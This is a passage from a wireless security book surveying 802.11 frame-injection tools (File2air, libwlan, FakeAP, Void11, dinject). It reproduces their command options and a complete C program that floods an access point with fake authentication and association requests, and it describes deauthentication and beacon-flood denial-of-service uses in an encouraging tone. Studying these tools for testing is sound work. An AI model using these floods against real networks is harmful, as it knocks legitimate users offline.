File2air - Straight from the field, this is the definitive guide to

File2air is a tool written by Joshua Wright to allow custom frame generation using the AirJack drivers. File2air reads binary output from a file and sends it to the air, as the tool's name suggests. This means that virtually any frame, including

802.1x frames, can be sent to the wireless network for whatever reason you

might have to send it. It also means that you will have to possess a good

knowledge of 802.11 (or other) protocols to write your custom frames in binary format to be fed to File2air and spend a sufficient time in front of your favorite hex editor (e.g., Gnome's Ghex). On the other hand, this gives you a good incentive to learn the protocol suite and enjoy complete freedom in what you send.

The first version (v0.1) of File2air, which came out just as the draft of this book entered the final stage, included three binary sample frames in the ./packets directory: deauthenticate, probe response, and eap-authentication-failure

(deauth.bin, proberesp.bin, and eap-failure.bin, respectively). See the README file for examples of attacks using these sample binaries. Doubtless, the number of binary frame files submitted by users will grow like an avalanche and the functionality of the tool will dramatically expand. For the users' convenience, variable fields in the frames such as source and destination MACs and ESSIDs can be overwritten from the command line when File2air is run:

arhontus:~# ./file2air -h

file2air v0.1 - inject 802.11 packets from binary files <Joshua.Wright@jwu.edu>

Usage: file2air [options]

-i --interface Interface to inject with

-c --channel Specify a channel (defaults to current)

-m --mode Specify an operating mode (defaults to current)

-r --monitor Specify RFMON mode (1=on, 0=off, defaults to current) -f --filename Specify a binary file contents for injection

-n --count Number of packets to send

-w --delay Delay between packets (uX for usec or X for seconds) -d --dest Override the destination address

-s --source Override the source address

-b --bssid Override the BSSID address

-h --help Output this help information and exit

-v -verbose Print verbose info (more -v's for more verbosity)

As you can see, both the number of sent frames and the interval between the

frames can be set. More interestingly, you can send frames in any operating mode including RFMON. Thus, you can sniff the WLAN and respond to specific events by sending back custom frames. For example, when a Netstumbler probe request is detected, you can send fake probe responses back to confuse those probing

Windows monkeys in the neighborhood.

Libwlan

If, instead of writing your customized frames in a hex editor, you prefer writing them in C, libwlan by Joachim Keinert, Charles Duntze, and Lionel Litty is a tool for you. It is a fine 802.11 frame-creation library working with Linux HostAP drivers. It includes socket initialization, frame-building code and headers

supporting creation of data, RTS/CTS, authentication and association requests, probe requests, and deauthentication and deassociation frames. The detailed

structure of 802.11 data, control and management frames, frame specifics, status and reason codes, and authentication "algorithms" (open or shared) are nicely outlined in the lib_total.h libwlan header, which is worth reading, even if only for educational purposes.

A sample progtest.c tool using libwlan to send a flood of association requests is included. We have decided to present it here as an example of how easy it is to create 802.11 frames using libwlan:

/****************************************************

progtest.c - description

---begin : 01/04/2003

****************************************************/

/****************************************************

* This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation

****************************************************/

/* This is an example of how to use Libwlan to develop a small program that tests an Access Point.

This program tries to associate a great number of fake stations to an Access Point to see how it behaves.

#include <libwlan.h>

int main(int argc, char *argv[])

{

int s,*len,i,j ;

const char *iface = NULL;

struct ieee80211_mgmt mgmt;

char *bssid_addr, *dst_addr, *src_addr;

u_char *bssid,*dst_mac,*src_mac;

if (argc != 5) {

printf("Usage: %s <wlan#ap> <bssid_address> <dst_address> <src_address>\n",argv[0]);

printf("Example: %s wlan0ap 00:01:23:45:0A 00:01:23:45:0A 00:02:4C:00:00\n"

,argv[0]);

exit(-1);

} else {

iface = argv[1];

bssid_addr = argv[2];

dst_addr = argv[3];

src_addr = argv[4];

}

s=socket_init(iface);

len = malloc (sizeof(int));

bssid = lib_hex_aton(bssid_addr,len);

dst_mac = lib_hex_aton(dst_addr,len);

src_mac = lib_hex_aton(src_addr,len);

for(j=1;j<244;j++){

for(i=1;i<244;i++){

src_mac[4] = i;

src_mac[5] = j;

mgmt = build_auth(bssid,src_mac,bssid);

if (send(s, &mgmt,IEEE80211_HDRLEN + sizeof(mgmt.u.auth),0) < 0) {

perror("send");

sleep (1); //wait for a while, buffer is possibly full }

mgmt = build_assoc_req(bssid,src_mac,bssid);

if (send(s, &mgmt,IEEE80211_HDRLEN + sizeof(mgmt.u.assoc_req),0) < 0)

perror("send");

usleep (100);

}

printf("Progression status: %.1f%% \n",j/244.0*100);

}

close(s);

return 0;

Just by changing a few variables in this example you would be able to send floods of other 802.11 frames outlined in the libwlan frame construction code and

headers. Happy pounding!

FakeAP

FakeAP is a Perl tool that uses the features of HostAP drivers and the iwconfig command to emit beacon frames with random or custom ESSIDs, BSSIDs (access point MACs), and channel assignments. It was originally designed as a wireless honeypot tool but can be maliciously used to do the following:

Flood a channel with a stream of beacon frames causing a DoS attack Increase the channel noise in the course of a man-in-the-middle attack

Drive a rogue access point detection system insane and fill its log space to full capacity

Whereas FakeAP for Linux is well known, few are aware that BSD FakeAP also exists and can be downloaded from http://bsdvault.net/bsdfap.txt. The

functionality of both original and BSD FakeAP is very similar and few differences are underlined in the BSD FakeAP code. You might want to tweak some variables in the FakeAP Perl script before running it:

use vars

qw( $sleep_opt $channel_opt $mac_opt $essid_opt $words_opt $interface_opt $vendors_opt $wep_opt $key_opt $power_opt );

my $MAX_CHANNEL = 11; # North America. Change for other regions.

my $IWCONFIG = "/sbin/iwconfig"; # Change as needed my $IFCONFIG = "/sbin/ifconfig"; # Change as needed

my $CRYPTCONF = "/usr/local/bin/hostap_crypt_conf"; # Change as needed my @words = ( "Access Point", "tsunami", "host", "airport", "linksys" );

my @vendors = ( "00:00:0C:", "00:00:CE:", "00:00:EF:" );

You might also want to play with word and MAC files included in the fakeap/lists directory.

Running FakeAP is easy:

arhontus:~# perl fakeap.pl

fakeap 0.3.1 - Wardriving countermeasures

[--essid NAME] [--words FILENAME] [--sleep N] [--vendors FILENAME]

[--wep N] [--key KEY] [--power N]

--channel X Use static channel X

--essid NAME Use static ESSID NAME

--mac XX:XX... Use static MAC address XX:...

--words FILE Use FILE to create ESSIDs

--sleep N Sleep N Ssec between changes, default 0.25 --vendor FILE Use FILE to define vendor MAC prefixes

--wep N Use WEP with probability N where 0 < N <= 1 --key KEY Use KEY as the WEP key. Passed raw to iwconfig --power N Vary Tx power between 1 and N. In milliwatts

An interesting option to consider is generating fake WEP-enabled access points.

Also, keep in mind that the interchangeable power transmission level might not be supported by your 802.11 Prism chipset card (remember, you need a Prism chipset device to use FakeAP) and is not implemented by the BSD FakeAP at the moment.

Void11

Void11 is another 802.11 frame-generating tool working under Jouni Malinen's Linux HostAP drivers (do not forget to define PRISM2_HOSTAPD in

driver/modules/hostap_config.h when compiling HostAP for void11 to work). It was designed for data link layer DoS resilience testing and possible active defense setup. Void11 can generate three types of 802.11 frames, namely deauthenticate, authenticate, and associate. The floods of authentication and association requests can crash or freeze some access points by filling up the buffer space assigned for handling and processing these requests. Two utilities included within void11 are void11_hopper and void11_penetration. The void11_hopper sets the wireless card under HostAP to hop through the 14 DSSS 802.11 channels, and

void11_penetration is the actual frame-generating tool:

arhontus# void11_penetration -h

/* void11 - 802.11b penetration testing utility

* version 20030829, send comments to reyk@vantronix.net *

* general options:

* -t val type (default: 1) * 0: no action

* 1: deauth stations * 2: auth flood

* 3: assoc flood

* -d n delay (default: 10000 usecs)

* -s MAC station (default: ff:ff:ff:ff:ff:ff / random) * -S str ssid (default: ' ')

* -h show this help

* -D debug (-DD... for more debug) *

* single target dos:

* -B MAC bssid (default: scan for bssids) *

* auto target dos:

* -m n max concurrent floods (default: 23 floods) * -T n timeout (default: 10 secs)

* -l file matchlist

* -p n match policy (white: 0, black: 1, default: 0) */

As you can see from the output, void11 is rich in options and can perform the following:

Scanning for the networks to attack

Attacking the network with a selected ESSID Attacking single or multiple hosts

Running up to 23 flood threads simultaneously

Selecting hosts to attack from a matchlist of MAC addresses Adjusting the delay between sent frames

You'll need to place a card into the Master (access point) mode before launching a deauthentication attack against a single wireless host.

Wnet

Wnet is an advanced packet creation and injection framework for building and injecting raw 802.11 frames under OpenBSD 3.2. Other OpenBSD versions and BSD flavors are likely to be supported in the future. Wnet consists of the libwnet library, the reinj ARP/TCP ACK injector we have already reviewed, and dinject.

To install dinject, first place your kernel source to /usr/src/sys, patch it with the wi.diff patch that comes with Wnet (cd wnet && sudo patch -d /usr/src -p1

< wi.diff) and recompile:

arhontus:~# cd /usr/src/sys/i386/compile/MYKERNEL arhontus:~# make

arhontus:~# cd /usr/src/sys/dev/ic

arhontus:~# cp if_wi*.h /usr/include/dev/ic arhontus:~# reboot

Then you'll need to compile libwnet:

arhontus:~# cd wnet/libwnet arhontus:~# make

arhontus:~# make install

and only then dinject:

arhontus:~# cd ../dinject

arhontus:~# make

arhontus:~# make install

Dinject is a Nemesis-like multifunctional 802.11 frame-building tool. Just like Nemesis, dinject consists of multiple "one frame typeone utility" tools. Set up your card into the HostAP mode (sudo wicontrol wi0 -p 5) and enjoy being able to send practically any type of custom-built 802.11 control or management frame, including the following:

Association request frames Association response frames ATIM frames

Authentication request frames Beacons

Custom data

Deauthentication request frames Deassociation request frames Probe requests

Probe responses

Reassociation requests Reassociation responses

Although dinject does not include any canned AirJack-style attack utilities, it is an immensely powerful tool in the hands of an attacker familiar with the 802.11

protocol stack and operations. Using dinject together with a 802.11 sniffer is also a great way to learn how 802.11 protocols work.

Dans le document Straight from the field, this is the definitive guide to (Page 178-191)